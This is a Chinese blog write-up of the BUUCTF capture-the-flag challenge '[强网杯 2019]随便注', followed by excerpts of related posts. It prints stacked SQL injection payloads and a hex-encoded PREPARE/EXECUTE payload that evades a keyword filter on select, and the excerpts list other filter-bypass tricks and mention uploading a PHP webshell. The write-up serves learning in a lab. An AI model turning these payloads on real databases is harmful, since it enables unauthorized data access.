[BUUCTF]-[强网杯 2019]随便注

最新推荐文章于 2023-11-26 20:50:04 发布
最新推荐文章于 2023-11-26 20:50:04 发布
阅读量198 收藏
点赞数
分类专栏: CTF系列问题 文章标签: SQL注入 十六进制转换 预处理语句 payload构造 数据库信息获取
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/120102610
版权

[BUUCTF]-[强网杯 2019]随便注

打开题目后

image-20210904164759502

简单测试一下,发现已经禁止了select|update|delete|drop|insert|where一些命令,select被禁用,无法查看数据库

image-20210904165013010

尝试堆叠注入 0’;show databases;#

image-20210904165608101

得到数据库名,然后查表名

1’;show tables;#

查看表中字段

1’;show columns from 1919810931114514;#

image-20210904165923972

此时还是需要select才能查询到,可以将select * from 1919810931114514 进行十六进制转换进行绕过

进行构造得到payload:;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

image-20210904170342996

prepare…from…是预处理语句,会进行编码转换。

execute用来执行由SQLPrepare创建的SQL语句。

SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。

参考:https://blog.csdn.net/qq_44657899/article/details/103239145?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.control&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.control#font_colorred_size5_3font_102

yyyyzzzllll
关注
专栏目录
CTF之web学习记录 -- SQL入检测绕过
lifanxin的博客
05-19 1034
SQL入检测绕过概述大小写绕过双写绕过编码绕过内联释绕过总结 概述   在学习了一些基本的sql入知识以及入技巧后,本篇博客将会总结一些常见的sql入检测绕过方法。 大小写绕过   大小写绕过很好理解,后端程序会过滤掉一些关键词,比如:select/union/and,此时就无法达到入的效果。想要绕过这种检测,只需要大写某些字母即可,比如:selEct/UniOn/And,之所以可以这样绕过,一是因为后端的检测逻辑不够完善,二是mysql并不区分大小写。 双写绕过   双写绕过在ctf比赛中十分
SQL入类型CTF题目总结
Lelouch_E的博客
11-25 1571
SQL入类型CTF题union 入buu Fakebookbuu Baby Sqli盲buu Hack World报错入buu hardsql其他buu BlackList union 入 buu Fakebook 册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
SQL入屏蔽词替换python脚本(例题:ctf.show-web7)
bin789456的博客
08-22 598
适用场景 在ctf中经常会有关键字的屏蔽,例如屏蔽空格,屏蔽select等关键字。使用脚本直接完成关键字替换,避免pyload修改过于麻烦。 同时适用于linux等命令的屏蔽 常见绕过 学习链接: https://www.cnblogs.com/Vinson404/p/7253255.html 脚本 shield=' '#屏蔽词 replace='/**/'#替换值 #and=&& or=|| #下面是参考payload,自己输入时释以#结尾最好 payload1="1' or 1=1
CTF刷题记录Buuctf-N1BOOK-sql2
m_de_g的博客
06-09 1199
N1BOOK-SQL2 一、解题思路 直接访问,会出现403,难受,再看一下提示:请访问/login.php /user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/user.php http://7496c5f0-0623-4702-951f-b085e8f8cb97.node3.buuoj.cn/login.php 1.养成好习惯,Ctrl + U 查看页面源代码 2.看到提示,那直接按照提示,走一波 3..
BUUCTF-强网杯2019随便 write up(笔记系列)
m0_62851980的博客
04-03 1719
打开靶机,输入万能密码1'or1=1;# 来查看所有内容: 万能密码原理: 万能密码能够绕过sql检测,在sql数据库中,运算符也是有优先级的,=优先于and,and优先于or,简单来说1=‘1’恒成立,因此返回值永远为True,且在SQL语法中 # 是释符,所以后面的语句都会杯释掉。 通过万能密码我们看到所有回显,以及所有信息,不过这样我们无法提取有用信息,所以下面我们输入1' union seclect 1,2 #回显一个正则过滤规则: 回显的正则过滤规则: 用1'...
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2728
buuctf强网杯2019为例的堆叠
BUUCTF-[强网杯 2019]随便
rumil的博客
06-28 201
首先,正常是查words表的数据,我们先将words表重命名成别的,名字任意。查看表的字段信息,发现flag,但是我们没有办法查看flag的内容,我们再看看words表中的数据字段。表改名,改为words,将flag字段改为id,然后在使用万能钥匙爆数据。观察发现,我们查出来的数据,可能就是words表当中的数据,我们可以将。意:表名如为数字时候,使用``引用,否则不能正常查看信息。输入3报错,将3换成2,若不报错,则说明该表有2列字段。最后,使用万能钥匙,爆表的数据。正常的提交数据,可查询出信息。
[CTF-writeup] BUUCTF强网杯2019_随便
最新发布
.
11-26 999
相对于比较简单的SQL入而言,这道题在步骤上确实显得有些曲折了,因为过滤机制给我们带来了一些麻烦。但总体而言,找入点、判断闭合方式、爆破表、爆破字段的思路还是比较清晰的。笔者在这道题中的做法——对已知表的结构进行修改,也可以提供一种灵活的思路。
BUUCTF [强网杯 2019]随便
m0_63253040的博客
03-28 819
这题和[SUCTF 2019]EasySQL类似,都可以使用堆叠入 参考wp 用1' or 1=1#可以爆出所有表内容 先尝试联合查询入 过滤了select,where等等,使用堆叠入 再看表 看下1919810931114514表 发现flag在里面,但是没办法查询,先看看word表 可以看见有字段id和data,这里应猜测查询语句 selsect id,data from words where id = 根据查询语句来改掉字段的名字 ...
BUUCTF强网杯 2019随便1 write up
GZWZ_的博客
04-06 4891
回显flag有好几种方法,但我只会一种┭┮﹏┭┮,如果有大佬会其他的,可不可以call我呢
BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
BUUCTF[强网杯2019]随便
楼阁de猫的博客
09-23 569
[强网杯2019]随便 知识点:堆叠入 首先先输入一个1’,发现报错,再输入1’#,有回显,再输入1’ order by 2#,1’order by 3#,当输入3的时候发现无回显,说明入点是2,但是当我们输入1’ union select 1,2#时,发现过滤了很多关键字,这时我们就要考虑堆叠入 我们输入1’; 发现下面出现了一条横线 那应该是堆叠入了,(什么是堆叠入呢:在SQL中,分号是用来表示一条sql语句的结束。如果在 ; 结束一个sql语句后继续构造下一条语句,效果就是分别执行两
buuctf-web-[强网杯 2019]随便-wp
居上
06-22 1418
[强网杯 2019]随便 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
[BUUCTF]-Basic-Upload-Labs-Linux
yzl_007的博客
08-27 5353
[BUUCTF]-Basic-Upload-Labs-Linux 打开环境地址,其实是upload-labs这个文件上传漏洞靶场,之前有文件已经介绍了各个关卡的通过技巧,这里给上链接 https://blog.csdn.net/yzl_007/article/details/119395730 然后这里演示一下第一关吧 禁用掉javascript,将划线部分删去 然后直接上传php一句话木马文件 返回地址 …/upload/shell.php 蚁剑连接 然后在根目录找到flag 可以每一关都尝试一下
【从0开始学web】78-88 文件包含
yzl_007的博客
10-14 3640
【从0开始学web】78-88 文件包含 文件包含题,可以先了解一下文件包含漏洞 https://blog.csdn.net/yzl_007/article/details/120261435 web78 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:2
curl_setopt 函数
yzl_007的博客
10-17 3548
curl_setopt 函数 php curl_setopt函数的作用是为一个CURL会话设置选项,其语法是“curl_setopt (int ch, string option, mixed value)”,参数“option”表示想要的设置。 三个参数分别的作用 ch 由 curl_init() 返回的 cURL 句柄。 option 需要设置的CURLOPT_XXX选项。 value 将设置在option选项上的值。 下面先看一个示例 //来源菜鸟教程,初始化一个新的cURL会话并获取一个网页 &lt
2021-深育杯misc - Login
yzl_007的博客
11-14 3184
Login 题目简介:这破网站为什么不能册? 题目访问ip:3001 打开环境后是一个登陆窗口,但是没有账号 点击下方的获取示例有提示 下载下来一个提示文件后发现是个加密的压缩包 明显的明文攻击,修改伪加密文件,提取出示例 - 副本.txt,添加到压缩包,然后明文攻击解得密码为qwe@123 打开后发现password还是加密的,其中1.txt都是低字节6kb 压缩包短文本文件的crc32碰撞 https://github.com/theonlypwner/crc32 拼接起来就是welc0me_
upload-labs靶场1-21关一些思路
yzl_007的博客
08-04 2283
upload-labs靶场1-21关一些思路 1、js绕过,后缀名绕过 查看源码分析,允许上传的文件类型为.jpg|.png|.gif,可以抓包修改后上传 修改后缀为php即可 放包然后可以看到页面成功上传 返回了地址,下面就可以利用工具进行连接了。 这里看到地址 …/upload/2.php 这里…/是上一目录的意思 所以地址是http://ip/upload-labs/upload/2.php 口令是sb 用蚁剑连接如图,测试连接数据返回成功 然后点击添加成功查看目录并且能访问所以有权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值